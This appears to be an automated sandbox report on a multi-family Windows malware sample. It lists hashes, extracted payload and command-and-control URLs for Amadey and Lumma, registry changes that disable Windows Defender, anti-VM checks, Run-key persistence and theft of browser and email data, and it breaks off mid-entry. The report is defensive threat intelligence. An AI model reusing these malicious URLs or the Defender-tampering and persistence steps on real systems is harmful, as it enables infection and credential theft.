Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
02/04/2025, 14:53
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
bb21f9fbe55dd586fd6433258aa91fe9
-
SHA1
88e463bbed4d3c0eb22c97d83a30614a8d79dd84
-
SHA256
66caf27768a2d6e9992f20b76cfcdf3e5a5863b951632fb6359c6fac733a1654
-
SHA512
b26a732ac31b93a354bffe0dc04051c87e830843168f5b2a2f3ca9d9a07672ae06363f8a0b62ae6f483c82bad557e11b72ce1616f7842ea5dcddea3c40b43b63
-
SSDEEP
24576:iqDEvCTbMWu7rQYlBQcBiT6rprG8a0Mu:iTvC/MTQYxsWR7a0M
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://iqironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://starcloc.bet/GOksAo
https://madvennture.top/GKsiio
https://targett.top/dsANGt
https://qspacedbv.world/EKdlsk
https://igalxnetb.today/GsuIAo
https://hcosmosyf.top/GOsznj
https://ironloxp.live/aksdd
https://hywnnavstarx.shop/FoaJSi
https://advennture.top/GKsiio
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://hadvennture.top/GKsiio
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/5980-635-0x0000000000A20000-0x0000000000E54000-memory.dmp healer behavioral1/memory/5980-634-0x0000000000A20000-0x0000000000E54000-memory.dmp healer behavioral1/memory/5980-741-0x0000000000A20000-0x0000000000E54000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" c6eefc65db.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" c6eefc65db.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" c6eefc65db.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" c6eefc65db.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" c6eefc65db.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection c6eefc65db.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" c6eefc65db.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" c6eefc65db.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications c6eefc65db.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" c6eefc65db.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral1/files/0x000f000000023f4d-99.dat family_stormkitty behavioral1/memory/3848-112-0x0000000000460000-0x000000000049C000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 6464 created 2632 6464 MSBuild.exe 44 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 632e73f709.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c6eefc65db.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0d58f17e45.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5a6472d2dc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4ef68b1a92.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 15 656 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 656 powershell.exe 2756 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 18 IoCs
flow pid Process 242 1676 svchost.exe 266 1744 rapes.exe 15 656 powershell.exe 309 1744 rapes.exe 32 1744 rapes.exe 32 1744 rapes.exe 32 1744 rapes.exe 32 1744 rapes.exe 32 1744 rapes.exe 32 1744 rapes.exe 32 1744 rapes.exe 32 1744 rapes.exe 32 1744 rapes.exe 32 1744 rapes.exe 187 3656 svchost015.exe 190 1744 rapes.exe 190 1744 rapes.exe 198 5048 svchost015.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 396 takeown.exe 112 icacls.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 632e73f709.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 632e73f709.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0d58f17e45.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a399701ee4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c6eefc65db.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c6eefc65db.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4ef68b1a92.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5a6472d2dc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5a6472d2dc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a399701ee4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4ef68b1a92.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0d58f17e45.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation 261.exe -
Deletes itself 1 IoCs
pid Process 2900 w32tm.exe -
Executes dropped EXE 26 IoCs
pid Process 4304 TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE 1744 rapes.exe 1840 apple.exe 1708 261.exe 2220 261.exe 704 3sZiUQa.exe 3848 KXtPusH.exe 1520 0d58f17e45.exe 3656 svchost015.exe 1800 5a6472d2dc.exe 5048 svchost015.exe 976 632e73f709.exe 3744 rapes.exe 4000 a399701ee4.exe 3432 9bdc94caf0.exe 5980 c6eefc65db.exe 5856 09e9f31660.exe 5168 e64ba97824.exe 5564 Rm3cVPI.exe 1968 UZPt0hR.exe 5560 qWR3lUj.exe 5672 tzutil.exe 2900 w32tm.exe 12964 rapes.exe 6432 TbV75ZR.exe 5752 4ef68b1a92.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine 4ef68b1a92.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine 632e73f709.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine c6eefc65db.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine 0d58f17e45.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine 5a6472d2dc.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine rapes.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 396 takeown.exe 112 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features c6eefc65db.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" c6eefc65db.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 KXtPusH.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 KXtPusH.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 KXtPusH.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a399701ee4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419560101\\a399701ee4.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9bdc94caf0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419570101\\9bdc94caf0.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c6eefc65db.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419580101\\c6eefc65db.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\632e73f709.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419550101\\632e73f709.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 60 ipinfo.io 61 ipinfo.io -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000f000000024165-261.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 4304 TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE 1744 rapes.exe 1520 0d58f17e45.exe 1800 5a6472d2dc.exe 976 632e73f709.exe 3744 rapes.exe 5980 c6eefc65db.exe 12964 rapes.exe 5752 4ef68b1a92.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 1520 set thread context of 3656 1520 0d58f17e45.exe 197 PID 1800 set thread context of 5048 1800 5a6472d2dc.exe 199 PID 5856 set thread context of 5284 5856 09e9f31660.exe 229 PID 5560 set thread context of 5700 5560 qWR3lUj.exe 247 PID 6432 set thread context of 6464 6432 TbV75ZR.exe 251 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4652 sc.exe 740 sc.exe 1624 sc.exe 736 sc.exe 2484 sc.exe 2520 sc.exe 2756 sc.exe 2368 sc.exe 4236 sc.exe 2360 sc.exe 4048 sc.exe 3216 sc.exe 4176 sc.exe 3096 sc.exe 3704 sc.exe 2340 sc.exe 4024 sc.exe 3696 sc.exe 1876 sc.exe 3560 sc.exe 4064 sc.exe 3668 sc.exe 5048 sc.exe 1184 sc.exe 656 sc.exe 3016 sc.exe 1340 sc.exe 3656 sc.exe 3128 sc.exe 1248 sc.exe 4572 sc.exe 4172 sc.exe 848 sc.exe 4504 sc.exe 1816 sc.exe 3284 sc.exe 1556 sc.exe 5076 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 2 IoCs
pid pid_target Process procid_target 1936 3848 WerFault.exe 180 5764 6464 WerFault.exe 251 -
System Location Discovery: System Language Discovery 1 TTPs 40 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 9bdc94caf0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5a6472d2dc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UZPt0hR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4ef68b1a92.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 632e73f709.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c6eefc65db.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-02_bb21f9fbe55dd586fd6433258aa91fe9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempKEKPYFP8JPGVZ81R1XB8OFQE3FJHT8BU.EXE Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 9bdc94caf0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9bdc94caf0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0d58f17e45.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e64ba97824.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KXtPusH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3052 cmd.exe 2220 netsh.exe -
Checks processor information in registry 2 TTPs 22 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 a399701ee4.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString a399701ee4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried 